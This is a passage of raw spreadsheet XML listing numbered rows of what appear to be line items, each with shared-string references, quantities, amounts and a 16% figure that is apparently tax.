      <c r="D1466" s="238" t="s">
        <v>8697</v>
      </c>
      <c r="E1466" s="238" t="s">
        <v>8147</v>
      </c>
      <c r="F1466" s="238" t="s">
        <v>8698</v>
      </c>
      <c r="G1466" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1466" s="10">
        <v>8</v>
      </c>
      <c r="I1466" s="14">
        <v>1488.08</v>
      </c>
      <c r="J1466" s="15">
        <v>238.0928</v>
      </c>
      <c r="K1466" s="16"/>
    </row>
    <row r="1467" spans="2:11">
      <c r="B1467" s="9">
        <v>1501</v>
      </c>
      <c r="C1467" s="238" t="s">
        <v>8699</v>
      </c>
      <c r="D1467" s="238" t="s">
        <v>8700</v>
      </c>
      <c r="E1467" s="238" t="s">
        <v>7519</v>
      </c>
      <c r="F1467" s="238" t="s">
        <v>8701</v>
      </c>
      <c r="G1467" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1467" s="10">
        <v>5</v>
      </c>
      <c r="I1467" s="14">
        <v>28461.56</v>
      </c>
      <c r="J1467" s="15">
        <v>4553.848</v>
      </c>
      <c r="K1467" s="16"/>
    </row>
    <row r="1468" spans="2:11">
      <c r="B1468" s="9">
        <v>1502</v>
      </c>
      <c r="C1468" s="238" t="s">
        <v>8702</v>
      </c>
      <c r="D1468" s="238" t="s">
        <v>8703</v>
      </c>
      <c r="E1468" s="238" t="s">
        <v>8704</v>
      </c>
      <c r="F1468" s="238" t="s">
        <v>8705</v>
      </c>
      <c r="G1468" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1468" s="10">
        <v>5</v>
      </c>
      <c r="I1468" s="14">
        <v>2179.48</v>
      </c>
      <c r="J1468" s="15">
        <v>348.72</v>
      </c>
      <c r="K1468" s="16"/>
    </row>
    <row r="1469" spans="2:11">
      <c r="B1469" s="9">
        <v>1503</v>
      </c>
      <c r="C1469" s="238" t="s">
        <v>8706</v>
      </c>
      <c r="D1469" s="238" t="s">
        <v>8707</v>
      </c>
      <c r="E1469" s="238" t="s">
        <v>8708</v>
      </c>
      <c r="F1469" s="238" t="s">
        <v>8709</v>
      </c>
      <c r="G1469" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1469" s="10">
        <v>3</v>
      </c>
      <c r="I1469" s="14">
        <v>336</v>
      </c>
      <c r="J1469" s="15">
        <v>53.76</v>
      </c>
      <c r="K1469" s="16"/>
    </row>
    <row r="1470" spans="2:11">
      <c r="B1470" s="9">
        <v>1504</v>
      </c>
      <c r="C1470" s="238" t="s">
        <v>8710</v>
      </c>
      <c r="D1470" s="238" t="s">
        <v>8711</v>
      </c>
      <c r="E1470" s="238" t="s">
        <v>7227</v>
      </c>
      <c r="F1470" s="238" t="s">
        <v>8712</v>
      </c>
      <c r="G1470" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1470" s="10">
        <v>2</v>
      </c>
      <c r="I1470" s="14">
        <v>60</v>
      </c>
      <c r="J1470" s="15">
        <v>9.6</v>
      </c>
      <c r="K1470" s="16"/>
    </row>
    <row r="1471" spans="2:11">
      <c r="B1471" s="9">
        <v>1505</v>
      </c>
      <c r="C1471" s="238" t="s">
        <v>8713</v>
      </c>
      <c r="D1471" s="238" t="s">
        <v>8714</v>
      </c>
      <c r="E1471" s="238" t="s">
        <v>7227</v>
      </c>
      <c r="F1471" s="238" t="s">
        <v>8715</v>
      </c>
      <c r="G1471" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1471" s="10">
        <v>5</v>
      </c>
      <c r="I1471" s="14">
        <v>137</v>
      </c>
      <c r="J1471" s="15">
        <v>21.92</v>
      </c>
      <c r="K1471" s="16"/>
    </row>
    <row r="1472" spans="2:11">
      <c r="B1472" s="9">
        <v>1506</v>
      </c>
      <c r="C1472" s="238" t="s">
        <v>8716</v>
      </c>
      <c r="D1472" s="238" t="s">
        <v>8717</v>
      </c>
      <c r="E1472" s="238" t="s">
        <v>7227</v>
      </c>
      <c r="F1472" s="238" t="s">
        <v>8718</v>
      </c>
      <c r="G1472" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1472" s="10">
        <v>43</v>
      </c>
      <c r="I1472" s="14">
        <v>800</v>
      </c>
      <c r="J1472" s="15">
        <v>127.968</v>
      </c>
      <c r="K1472" s="16"/>
    </row>
    <row r="1473" spans="2:11">
      <c r="B1473" s="9">
        <v>1507</v>
      </c>
      <c r="C1473" s="238" t="s">
        <v>8719</v>
      </c>
      <c r="D1473" s="238" t="s">
        <v>8720</v>
      </c>
      <c r="E1473" s="238" t="s">
        <v>6810</v>
      </c>
      <c r="F1473" s="238" t="s">
        <v>8721</v>
      </c>
      <c r="G1473" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1473" s="10">
        <v>113</v>
      </c>
      <c r="I1473" s="14">
        <v>2275.29</v>
      </c>
      <c r="J1473" s="15">
        <v>364.1312</v>
      </c>
      <c r="K1473" s="16"/>
    </row>
    <row r="1474" spans="2:11">
      <c r="B1474" s="9">
        <v>1508</v>
      </c>
      <c r="C1474" s="238" t="s">
        <v>8722</v>
      </c>
      <c r="D1474" s="238" t="s">
        <v>8723</v>
      </c>
      <c r="E1474" s="238" t="s">
        <v>4909</v>
      </c>
      <c r="F1474" s="238" t="s">
        <v>8724</v>
      </c>
      <c r="G1474" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1474" s="10">
        <v>35</v>
      </c>
      <c r="I1474" s="14">
        <v>40</v>
      </c>
      <c r="J1474" s="15">
        <v>6.384</v>
      </c>
      <c r="K1474" s="16"/>
    </row>
    <row r="1475" spans="2:11">
      <c r="B1475" s="9">
        <v>1509</v>
      </c>
      <c r="C1475" s="238" t="s">
        <v>8725</v>
      </c>
      <c r="D1475" s="238" t="s">
        <v>8726</v>
      </c>
      <c r="E1475" s="238" t="s">
        <v>6726</v>
      </c>
      <c r="F1475" s="238" t="s">
        <v>8727</v>
      </c>
      <c r="G1475" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1475" s="10">
        <v>4</v>
      </c>
      <c r="I1475" s="14">
        <v>345.44</v>
      </c>
      <c r="J1475" s="15">
        <v>55.2704</v>
      </c>
      <c r="K1475" s="16"/>
    </row>
    <row r="1476" spans="2:11">
      <c r="B1476" s="9">
        <v>1510</v>
      </c>
      <c r="C1476" s="238" t="s">
        <v>8728</v>
      </c>
      <c r="D1476" s="238" t="s">
        <v>8729</v>
      </c>
      <c r="E1476" s="238" t="s">
        <v>8730</v>
      </c>
      <c r="F1476" s="238" t="s">
        <v>8731</v>
      </c>
      <c r="G1476" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1476" s="10">
        <v>6</v>
      </c>
      <c r="I1476" s="14">
        <v>1296</v>
      </c>
      <c r="J1476" s="15">
        <v>207.36</v>
      </c>
      <c r="K1476" s="16"/>
    </row>
    <row r="1477" spans="2:11">
      <c r="B1477" s="9">
        <v>1511</v>
      </c>
      <c r="C1477" s="238" t="s">
        <v>8732</v>
      </c>
      <c r="D1477" s="238" t="s">
        <v>6484</v>
      </c>
      <c r="E1477" s="238" t="s">
        <v>6485</v>
      </c>
      <c r="F1477" s="9"/>
      <c r="G1477" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1477" s="10">
        <v>1</v>
      </c>
      <c r="I1477" s="14">
        <v>1748</v>
      </c>
      <c r="J1477" s="15">
        <v>279.68</v>
      </c>
      <c r="K1477" s="16"/>
    </row>
    <row r="1478" spans="2:11">
      <c r="B1478" s="9">
        <v>1512</v>
      </c>
      <c r="C1478" s="238" t="s">
        <v>8733</v>
      </c>
      <c r="D1478" s="238" t="s">
        <v>8559</v>
      </c>
      <c r="E1478" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F1478" s="9"/>
      <c r="G1478" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1478" s="10">
        <v>24</v>
      </c>
      <c r="I1478" s="14">
        <v>22.21</v>
      </c>
      <c r="J1478" s="15">
        <v>3.5712</v>
      </c>
      <c r="K1478" s="16"/>
    </row>
    <row r="1479" spans="2:11">
      <c r="B1479" s="9">
        <v>1513</v>
      </c>
      <c r="C1479" s="238" t="s">
        <v>8734</v>
      </c>
      <c r="D1479" s="238" t="s">
        <v>8735</v>
      </c>
      <c r="E1479" s="238" t="s">
        <v>5370</v>
      </c>
      <c r="F1479" s="238" t="s">
        <v>8736</v>
      </c>
      <c r="G1479" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1479" s="10">
        <v>3</v>
      </c>
      <c r="I1479" s="14">
        <v>1341.54</v>
      </c>
      <c r="J1479" s="15">
        <v>214.6464</v>
      </c>
      <c r="K1479" s="16"/>
    </row>
    <row r="1480" spans="2:11">
      <c r="B1480" s="9">
        <v>1514</v>
      </c>
      <c r="C1480" s="238" t="s">
        <v>8737</v>
      </c>
      <c r="D1480" s="238" t="s">
        <v>8738</v>
      </c>
      <c r="E1480" s="238" t="s">
        <v>5350</v>
      </c>
      <c r="F1480" s="238" t="s">
        <v>8739</v>
      </c>
      <c r="G1480" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1480" s="10">
        <v>9</v>
      </c>
      <c r="I1480" s="14">
        <v>615.34</v>
      </c>
      <c r="J1480" s="15">
        <v>98.4528</v>
      </c>
      <c r="K1480" s="16"/>
    </row>
    <row r="1481" spans="2:11">
      <c r="B1481" s="9">
        <v>1515</v>
      </c>
      <c r="C1481" s="238" t="s">
        <v>8740</v>
      </c>
      <c r="D1481" s="238" t="s">
        <v>8741</v>
      </c>
      <c r="E1481" s="238" t="s">
        <v>8742</v>
      </c>
      <c r="F1481" s="9"/>
      <c r="G1481" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1481" s="10">
        <v>20</v>
      </c>
      <c r="I1481" s="14">
        <v>598.53</v>
      </c>
      <c r="J1481" s="15">
        <v>95.776</v>
      </c>
      <c r="K1481" s="16"/>
    </row>
    <row r="1482" spans="2:11">
      <c r="B1482" s="9">
        <v>1516</v>
      </c>
      <c r="C1482" s="238" t="s">
        <v>8743</v>
      </c>
      <c r="D1482" s="238" t="s">
        <v>8744</v>
      </c>
      <c r="E1482" s="238" t="s">
        <v>8745</v>
      </c>
      <c r="F1482" s="238" t="s">
        <v>8746</v>
      </c>
      <c r="G1482" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1482" s="10">
        <v>2</v>
      </c>
      <c r="I1482" s="14">
        <v>1495.84</v>
      </c>
      <c r="J1482" s="15">
        <v>239.3344</v>
      </c>
      <c r="K1482" s="16"/>
    </row>
    <row r="1483" spans="2:11">
      <c r="B1483" s="9">
        <v>1517</v>
      </c>
      <c r="C1483" s="238" t="s">
        <v>8747</v>
      </c>
      <c r="D1483" s="238" t="s">
        <v>8748</v>
      </c>
      <c r="E1483" s="238" t="s">
        <v>6726</v>
      </c>
      <c r="F1483" s="238" t="s">
        <v>8749</v>
      </c>
      <c r="G1483" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1483" s="10">
        <v>1</v>
      </c>
      <c r="I1483" s="14">
        <v>264.96</v>
      </c>
      <c r="J1483" s="15">
        <v>42.3936</v>
      </c>
      <c r="K1483" s="16"/>
    </row>
    <row r="1484" spans="2:11">
      <c r="B1484" s="9">
        <v>1518</v>
      </c>
      <c r="C1484" s="238" t="s">
        <v>8750</v>
      </c>
      <c r="D1484" s="238" t="s">
        <v>8751</v>
      </c>
      <c r="E1484" s="238" t="s">
        <v>8704</v>
      </c>
      <c r="F1484" s="238" t="s">
        <v>8752</v>
      </c>
      <c r="G1484" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1484" s="10">
        <v>6</v>
      </c>
      <c r="I1484" s="14">
        <v>779.47</v>
      </c>
      <c r="J1484" s="15">
        <v>124.7136</v>
      </c>
      <c r="K1484" s="16"/>
    </row>
    <row r="1485" spans="2:11">
      <c r="B1485" s="9">
        <v>1519</v>
      </c>
      <c r="C1485" s="238" t="s">
        <v>8753</v>
      </c>
      <c r="D1485" s="238" t="s">
        <v>8754</v>
      </c>
      <c r="E1485" s="238" t="s">
        <v>8755</v>
      </c>
      <c r="F1485" s="238" t="s">
        <v>8756</v>
      </c>
      <c r="G1485" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1485" s="10">
        <v>1</v>
      </c>
      <c r="I1485" s="14">
        <v>390.67</v>
      </c>
      <c r="J1485" s="15">
        <v>62.5072</v>
      </c>
      <c r="K1485" s="16"/>
    </row>
    <row r="1486" spans="2:11">
      <c r="B1486" s="9">
        <v>1520</v>
      </c>
      <c r="C1486" s="238" t="s">
        <v>8757</v>
      </c>
      <c r="D1486" s="238" t="s">
        <v>8758</v>
      </c>
      <c r="E1486" s="238" t="s">
        <v>5370</v>
      </c>
      <c r="F1486" s="238" t="s">
        <v>8759</v>
      </c>
      <c r="G1486" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1486" s="10">
        <v>3</v>
      </c>
      <c r="I1486" s="14">
        <v>600</v>
      </c>
      <c r="J1486" s="15">
        <v>96</v>
      </c>
      <c r="K1486" s="16"/>
    </row>
    <row r="1487" spans="2:11">
      <c r="B1487" s="9">
        <v>1521</v>
      </c>
      <c r="C1487" s="238" t="s">
        <v>8760</v>
      </c>
      <c r="D1487" s="238" t="s">
        <v>8761</v>
      </c>
      <c r="E1487" s="238" t="s">
        <v>6672</v>
      </c>
      <c r="F1487" s="238" t="s">
        <v>8762</v>
      </c>
      <c r="G1487" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1487" s="10">
        <v>2</v>
      </c>
      <c r="I1487" s="14">
        <v>276.53</v>
      </c>
      <c r="J1487" s="15">
        <v>44.2464</v>
      </c>
      <c r="K1487" s="16"/>
    </row>
    <row r="1488" spans="2:11">
      <c r="B1488" s="9">
        <v>1522</v>
      </c>
      <c r="C1488" s="238" t="s">
        <v>8763</v>
      </c>
      <c r="D1488" s="238" t="s">
        <v>8764</v>
      </c>
      <c r="E1488" s="238" t="s">
        <v>8310</v>
      </c>
      <c r="F1488" s="238" t="s">
        <v>8765</v>
      </c>
      <c r="G1488" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1488" s="10">
        <v>2</v>
      </c>
      <c r="I1488" s="14">
        <v>80</v>
      </c>
      <c r="J1488" s="15">
        <v>12.8</v>
      </c>
      <c r="K1488" s="16"/>
    </row>
    <row r="1489" spans="2:11">
      <c r="B1489" s="9">
        <v>1523</v>
      </c>
      <c r="C1489" s="238" t="s">
        <v>8766</v>
      </c>
      <c r="D1489" s="238" t="s">
        <v>8767</v>
      </c>
      <c r="E1489" s="238" t="s">
        <v>8147</v>
      </c>
      <c r="F1489" s="238" t="s">
        <v>8768</v>
      </c>
      <c r="G1489" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1489" s="10">
        <v>10</v>
      </c>
      <c r="I1489" s="14">
        <v>96</v>
      </c>
      <c r="J1489" s="15">
        <v>15.36</v>
      </c>
      <c r="K1489" s="16"/>
    </row>
    <row r="1490" spans="2:11">
      <c r="B1490" s="9">
        <v>1524</v>
      </c>
      <c r="C1490" s="238" t="s">
        <v>8769</v>
      </c>
      <c r="D1490" s="238" t="s">
        <v>8770</v>
      </c>
      <c r="E1490" s="238" t="s">
        <v>3854</v>
      </c>
      <c r="F1490" s="238" t="s">
        <v>8771</v>
      </c>
      <c r="G1490" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1490" s="10">
        <v>2</v>
      </c>
      <c r="I1490" s="14">
        <v>8020</v>
      </c>
      <c r="J1490" s="15">
        <v>1283.2</v>
      </c>
      <c r="K1490" s="16"/>
    </row>
    <row r="1491" spans="2:11">
      <c r="B1491" s="9">
        <v>1525</v>
      </c>
      <c r="C1491" s="238" t="s">
        <v>8772</v>
      </c>
      <c r="D1491" s="238" t="s">
        <v>8773</v>
      </c>
      <c r="E1491" s="238" t="s">
        <v>7227</v>
      </c>
      <c r="F1491" s="238" t="s">
        <v>8774</v>
      </c>
      <c r="G1491" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1491" s="10">
        <v>16</v>
      </c>
      <c r="I1491" s="14">
        <v>110.84</v>
      </c>
      <c r="J1491" s="15">
        <v>17.7408</v>
      </c>
      <c r="K1491" s="16"/>
    </row>
    <row r="1492" spans="2:11">
      <c r="B1492" s="9">
        <v>1526</v>
      </c>
      <c r="C1492" s="238" t="s">
        <v>8775</v>
      </c>
      <c r="D1492" s="238" t="s">
        <v>8776</v>
      </c>
      <c r="E1492" s="238" t="s">
        <v>7227</v>
      </c>
      <c r="F1492" s="238" t="s">
        <v>8777</v>
      </c>
      <c r="G1492" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1492" s="10">
        <v>23</v>
      </c>
      <c r="I1492" s="14">
        <v>1534</v>
      </c>
      <c r="J1492" s="15">
        <v>245.456</v>
      </c>
      <c r="K1492" s="16"/>
    </row>
    <row r="1493" spans="2:11">
      <c r="B1493" s="9">
        <v>1527</v>
      </c>
      <c r="C1493" s="238" t="s">
        <v>8778</v>
      </c>
      <c r="D1493" s="238" t="s">
        <v>8779</v>
      </c>
      <c r="E1493" s="238" t="s">
        <v>5354</v>
      </c>
      <c r="F1493" s="238" t="s">
        <v>8780</v>
      </c>
      <c r="G1493" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1493" s="10">
        <v>9</v>
      </c>
      <c r="I1493" s="14">
        <v>76.92</v>
      </c>
      <c r="J1493" s="15">
        <v>12.312</v>
      </c>
      <c r="K1493" s="16"/>
    </row>
    <row r="1494" spans="2:11">
      <c r="B1494" s="9">
        <v>1528</v>
      </c>
      <c r="C1494" s="238" t="s">
        <v>8781</v>
      </c>
      <c r="D1494" s="238" t="s">
        <v>8782</v>
      </c>
      <c r="E1494" s="238" t="s">
        <v>8783</v>
      </c>
      <c r="F1494" s="9"/>
      <c r="G1494" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1494" s="10">
        <v>8</v>
      </c>
      <c r="I1494" s="14">
        <v>3588.89</v>
      </c>
      <c r="J1494" s="15">
        <v>574.2208</v>
      </c>
      <c r="K1494" s="16"/>
    </row>
    <row r="1495" spans="2:11">
      <c r="B1495" s="9">
        <v>1529</v>
      </c>
      <c r="C1495" s="238" t="s">
        <v>8784</v>
      </c>
      <c r="D1495" s="238" t="s">
        <v>8785</v>
      </c>
      <c r="E1495" s="238" t="s">
        <v>3011</v>
      </c>
      <c r="F1495" s="238" t="s">
        <v>8786</v>
      </c>
      <c r="G1495" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1495" s="10">
        <v>1</v>
      </c>
      <c r="I1495" s="14">
        <v>92</v>
      </c>
      <c r="J1495" s="15">
        <v>14.72</v>
      </c>
      <c r="K1495" s="16"/>
    </row>
    <row r="1496" spans="2:11">
      <c r="B1496" s="9">
        <v>1530</v>
      </c>
      <c r="C1496" s="238" t="s">
        <v>8787</v>
      </c>
      <c r="D1496" s="238" t="s">
        <v>8788</v>
      </c>
      <c r="E1496" s="238" t="s">
        <v>4755</v>
      </c>
      <c r="F1496" s="238" t="s">
        <v>8789</v>
      </c>
      <c r="G1496" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1496" s="10">
        <v>7</v>
      </c>
      <c r="I1496" s="14">
        <v>3309.26</v>
      </c>
      <c r="J1496" s="15">
        <v>529.48</v>
      </c>
      <c r="K1496" s="16"/>
    </row>
    <row r="1497" spans="2:11">
      <c r="B1497" s="9">
        <v>1531</v>
      </c>
      <c r="C1497" s="238" t="s">
        <v>8790</v>
      </c>
      <c r="D1497" s="238" t="s">
        <v>8791</v>
      </c>
      <c r="E1497" s="238" t="s">
        <v>3011</v>
      </c>
      <c r="F1497" s="238" t="s">
        <v>8792</v>
      </c>
      <c r="G1497" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1497" s="10">
        <v>6</v>
      </c>
      <c r="I1497" s="14">
        <v>355</v>
      </c>
      <c r="J1497" s="15">
        <v>56.8032</v>
      </c>
      <c r="K1497" s="16"/>
    </row>
    <row r="1498" spans="2:11">
      <c r="B1498" s="9">
        <v>1532</v>
      </c>
      <c r="C1498" s="238" t="s">
        <v>8793</v>
      </c>
      <c r="D1498" s="238" t="s">
        <v>8794</v>
      </c>
      <c r="E1498" s="238" t="s">
        <v>6915</v>
      </c>
      <c r="F1498" s="238" t="s">
        <v>8795</v>
      </c>
      <c r="G1498" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1498" s="10">
        <v>1</v>
      </c>
      <c r="I1498" s="14">
        <v>65</v>
      </c>
      <c r="J1498" s="15">
        <v>10.4</v>
      </c>
      <c r="K1498" s="16"/>
    </row>
    <row r="1499" spans="2:11">
      <c r="B1499" s="9">
        <v>1533</v>
      </c>
      <c r="C1499" s="238" t="s">
        <v>8796</v>
      </c>
      <c r="D1499" s="238" t="s">
        <v>8797</v>
      </c>
      <c r="E1499" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F1499" s="238" t="s">
        <v>8798</v>
      </c>
      <c r="G1499" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1499" s="10">
        <v>59</v>
      </c>
      <c r="I1499" s="14">
        <v>243.74</v>
      </c>
      <c r="J1499" s="15">
        <v>38.9872</v>
      </c>
      <c r="K1499" s="16"/>
    </row>
    <row r="1500" spans="2:11">
      <c r="B1500" s="9">
        <v>1534</v>
      </c>
      <c r="C1500" s="238" t="s">
        <v>8799</v>
      </c>
      <c r="D1500" s="238" t="s">
        <v>8800</v>
      </c>
      <c r="E1500" s="238" t="s">
        <v>4735</v>
      </c>
      <c r="F1500" s="238" t="s">
        <v>8801</v>
      </c>
      <c r="G1500" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1500" s="10">
        <v>1</v>
      </c>
      <c r="I1500" s="14">
        <v>726.48</v>
      </c>
      <c r="J1500" s="15">
        <v>116.2368</v>
      </c>
      <c r="K1500" s="16"/>
    </row>
    <row r="1501" spans="2:11">
      <c r="B1501" s="9">
        <v>1535</v>
      </c>
      <c r="C1501" s="238" t="s">
        <v>8802</v>
      </c>
      <c r="D1501" s="238" t="s">
        <v>8803</v>
      </c>
      <c r="E1501" s="238" t="s">
        <v>6224</v>
      </c>
      <c r="F1501" s="238" t="s">
        <v>8804</v>
      </c>
      <c r="G1501" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1501" s="10">
        <v>49</v>
      </c>
      <c r="I1501" s="14">
        <v>6660.92</v>
      </c>
      <c r="J1501" s="15">
        <v>1065.7696</v>
      </c>
      <c r="K1501" s="16"/>
    </row>
    <row r="1502" spans="2:11">
      <c r="B1502" s="9">
        <v>1536</v>
      </c>
      <c r="C1502" s="238" t="s">
        <v>8805</v>
      </c>
      <c r="D1502" s="238" t="s">
        <v>8806</v>
      </c>
      <c r="E1502" s="238" t="s">
        <v>8655</v>
      </c>
      <c r="F1502" s="238" t="s">
        <v>8807</v>
      </c>
      <c r="G1502" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1502" s="10">
        <v>70</v>
      </c>
      <c r="I1502" s="14">
        <v>3379.93</v>
      </c>
      <c r="J1502" s="15">
        <v>540.736</v>
      </c>
      <c r="K1502" s="16"/>
    </row>
    <row r="1503" spans="2:11">
      <c r="B1503" s="9">
        <v>1537</v>
      </c>
      <c r="C1503" s="238" t="s">
        <v>8808</v>
      </c>
      <c r="D1503" s="238" t="s">
        <v>8809</v>
      </c>
      <c r="E1503" s="238" t="s">
        <v>8147</v>
      </c>
      <c r="F1503" s="238" t="s">
        <v>8810</v>
      </c>
      <c r="G1503" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1503" s="10">
        <v>56</v>
      </c>
      <c r="I1503" s="14">
        <v>3048.27</v>
      </c>
      <c r="J1503" s="15">
        <v>487.6928</v>
      </c>
      <c r="K1503" s="16"/>
    </row>
    <row r="1504" spans="2:11">
      <c r="B1504" s="9">
        <v>1538</v>
      </c>
      <c r="C1504" s="238" t="s">
        <v>8811</v>
      </c>
      <c r="D1504" s="238" t="s">
        <v>8812</v>
      </c>
      <c r="E1504" s="238" t="s">
        <v>8147</v>
      </c>
      <c r="F1504" s="238" t="s">
        <v>8813</v>
      </c>
      <c r="G1504" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1504" s="10">
        <v>4</v>
      </c>
      <c r="I1504" s="14">
        <v>290.6</v>
      </c>
      <c r="J1504" s="15">
        <v>46.496</v>
      </c>
      <c r="K1504" s="16"/>
    </row>
    <row r="1505" spans="2:11">
      <c r="B1505" s="9">
        <v>1539</v>
      </c>
      <c r="C1505" s="238" t="s">
        <v>8814</v>
      </c>
      <c r="D1505" s="238" t="s">
        <v>8815</v>
      </c>
      <c r="E1505" s="238" t="s">
        <v>4909</v>
      </c>
      <c r="F1505" s="238" t="s">
        <v>8816</v>
      </c>
      <c r="G1505" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1505" s="10">
        <v>143</v>
      </c>
      <c r="I1505" s="14">
        <v>3571.16</v>
      </c>
      <c r="J1505" s="15">
        <v>571.3136</v>
      </c>
      <c r="K1505" s="16"/>
    </row>
    <row r="1506" spans="2:11">
      <c r="B1506" s="9">
        <v>1540</v>
      </c>
      <c r="C1506" s="238" t="s">
        <v>8817</v>
      </c>
      <c r="D1506" s="238" t="s">
        <v>8818</v>
      </c>
      <c r="E1506" s="238" t="s">
        <v>8642</v>
      </c>
      <c r="F1506" s="238" t="s">
        <v>8819</v>
      </c>
      <c r="G1506" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1506" s="10">
        <v>21</v>
      </c>
      <c r="I1506" s="14">
        <v>295.16</v>
      </c>
      <c r="J1506" s="15">
        <v>47.2416</v>
      </c>
      <c r="K1506" s="16"/>
    </row>
    <row r="1507" spans="2:11">
      <c r="B1507" s="9">
        <v>1541</v>
      </c>
      <c r="C1507" s="238" t="s">
        <v>8820</v>
      </c>
      <c r="D1507" s="238" t="s">
        <v>8821</v>
      </c>
      <c r="E1507" s="238" t="s">
        <v>8822</v>
      </c>
      <c r="F1507" s="9"/>
      <c r="G1507" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1507" s="10">
        <v>7</v>
      </c>
      <c r="I1507" s="14">
        <v>1217.26</v>
      </c>
      <c r="J1507" s="15">
        <v>194.7568</v>
      </c>
      <c r="K1507" s="16"/>
    </row>
    <row r="1508" spans="2:11">
      <c r="B1508" s="9">
        <v>1542</v>
      </c>
      <c r="C1508" s="238" t="s">
        <v>8823</v>
      </c>
      <c r="D1508" s="238" t="s">
        <v>8824</v>
      </c>
      <c r="E1508" s="238" t="s">
        <v>4735</v>
      </c>
      <c r="F1508" s="238" t="s">
        <v>8825</v>
      </c>
      <c r="G1508" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1508" s="10">
        <v>3</v>
      </c>
      <c r="I1508" s="14">
        <v>820.51</v>
      </c>
      <c r="J1508" s="15">
        <v>131.28</v>
      </c>
      <c r="K1508" s="16"/>
    </row>
    <row r="1509" spans="2:11">
      <c r="B1509" s="9">
        <v>1543</v>
      </c>
      <c r="C1509" s="238" t="s">
        <v>8826</v>
      </c>
      <c r="D1509" s="238" t="s">
        <v>8827</v>
      </c>
      <c r="E1509" s="238" t="s">
        <v>5364</v>
      </c>
      <c r="F1509" s="238" t="s">
        <v>8828</v>
      </c>
      <c r="G1509" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1509" s="10">
        <v>21</v>
      </c>
      <c r="I1509" s="14">
        <v>790.34</v>
      </c>
      <c r="J1509" s="15">
        <v>126.4704</v>
      </c>
      <c r="K1509" s="16"/>
    </row>
    <row r="1510" spans="2:11">
      <c r="B1510" s="9">
        <v>1544</v>
      </c>
      <c r="C1510" s="238" t="s">
        <v>8829</v>
      </c>
      <c r="D1510" s="238" t="s">
        <v>8830</v>
      </c>
      <c r="E1510" s="238" t="s">
        <v>8147</v>
      </c>
      <c r="F1510" s="238" t="s">
        <v>8831</v>
      </c>
      <c r="G1510" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1510" s="10">
        <v>32</v>
      </c>
      <c r="I1510" s="14">
        <v>586</v>
      </c>
      <c r="J1510" s="15">
        <v>93.7472</v>
      </c>
      <c r="K1510" s="16"/>
    </row>
    <row r="1511" spans="2:11">
      <c r="B1511" s="9">
        <v>1545</v>
      </c>
      <c r="C1511" s="238" t="s">
        <v>8832</v>
      </c>
      <c r="D1511" s="238" t="s">
        <v>8833</v>
      </c>
      <c r="E1511" s="238" t="s">
        <v>4909</v>
      </c>
      <c r="F1511" s="238" t="s">
        <v>8834</v>
      </c>
      <c r="G1511" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1511" s="10">
        <v>31</v>
      </c>
      <c r="I1511" s="14">
        <v>554.1</v>
      </c>
      <c r="J1511" s="15">
        <v>88.6352</v>
      </c>
      <c r="K1511" s="16"/>
    </row>
    <row r="1512" spans="2:11">
      <c r="B1512" s="9">
        <v>1546</v>
      </c>
      <c r="C1512" s="238" t="s">
        <v>8835</v>
      </c>
      <c r="D1512" s="238" t="s">
        <v>8836</v>
      </c>
      <c r="E1512" s="238" t="s">
        <v>3897</v>
      </c>
      <c r="F1512" s="238" t="s">
        <v>8837</v>
      </c>
      <c r="G1512" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1512" s="10">
        <v>1</v>
      </c>
      <c r="I1512" s="14">
        <v>836</v>
      </c>
      <c r="J1512" s="15">
        <v>133.76</v>
      </c>
      <c r="K1512" s="16"/>
    </row>
    <row r="1513" spans="2:11">
      <c r="B1513" s="9">
        <v>1547</v>
      </c>
      <c r="C1513" s="238" t="s">
        <v>8838</v>
      </c>
      <c r="D1513" s="238" t="s">
        <v>8839</v>
      </c>
      <c r="E1513" s="238" t="s">
        <v>5370</v>
      </c>
      <c r="F1513" s="238" t="s">
        <v>8840</v>
      </c>
      <c r="G1513" s="237" t="s">
        <v>507</v>
